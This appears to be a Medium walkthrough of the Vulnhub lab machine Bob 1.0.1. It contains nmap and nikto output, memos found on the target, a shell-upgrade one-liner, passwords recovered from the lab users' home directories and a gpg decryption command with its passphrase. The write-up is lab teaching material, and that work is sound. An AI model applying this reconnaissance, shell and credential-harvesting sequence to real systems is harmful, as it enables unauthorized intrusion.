Bob 1.0.1 Vulnhub Walkthrough

1. Service Enumeration

nmap -O -A -sT -sV -p- -T5 -vvv
80/tcp    open  http    syn-ack Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh syn-ack OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCt2rmQKSTx+fbTOy3a0DG0GI5KOP+x81YHI31kH8V+gXu+BhrvzTtvQbg/KUaxkxNXirQKm3v23b/BNGLm2EmG28T8H1kisT5LhmfJ+w1X/Y7xnXiTYxwxKWF8NHMsQGIKWB8bCPK+2LvG3MdF6cKniSIiT8C8N66F6yTPQyuW9z68pK7Zj4wm0nrkvQ9Mr++Kj4A4WIhxaYd0+hPnSUNIGLr+XC7mRVUtDSvfP0RqguibeQ2yoB974ZTF0uU0Zpq7BK8/loAl4nFu/6vwLU7BjYm3BlU3fvjDNlSwqbsjwgn/kTfySxZ/WiifZW3U1WLLdY4CQZ++nR2odDNy8YQb
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIntdI8IcX2n63A3tEIasPt0W0Lg31IAVGyzesYMblJsc1zM1jmaJ9d6w6PpZKa+7Ow/5yXX2DOF03pAHXP1S5A=
| 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMmbgZpOuy0D5idStSgBUVb4JjRuAdv/7XF5dGDJgUqE
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8

2. Web Enumeration

root@kali:~# nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 80
+ Start Time: 2018-05-26 03:50:55 (GMT-4)
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-05-26 03:52:41 (GMT-4) (106 seconds)
+ 1 host(s) tested
Memo sent at GMT+10:00 2:37:42 by User: Bob 
Hey guys IT here don't forget to check your emails regarding the recent security breach. There is a web shell running on the server with no protection but it should be safe as I have ported over the filter from the old windows server to our new linux one. Your email will have the link to the shell.
Really who made this file at least get a hash of your password to display, hackers can't do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:( 

3. Establish a foothold

python -c 'import pty; pty.spawn("/bin/bash")'

4. Privilege Escalation

Bob’s Home Directory

Elliot’s Home Directory

  • elliot:theadminisdumb
  • jc:Qwerty
  • seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Seb’s Home Directory

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CS 373 Spring 2022: Mara Manskie: Final Entry

Object Instantiation, Table Rows, and Video Game Characters

Efficiently Handling Transient Errors

How logging libraries help our teams support products

New Event: HandyPick Reward: Up to 130 Handy ($2.2) + 30 Handy ($0.52) for every refer

The Life-improving power of coding and diversity

Object Relationships

Leetcode 295. Find Median from Data Stream

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


More from Medium

TryHackMe: Smag Grotto

Intigriti -1337up CTF — Warmup Encoder writeup

Archtype HackTheBox Ctf

4 Worst Myths about Cybersecurity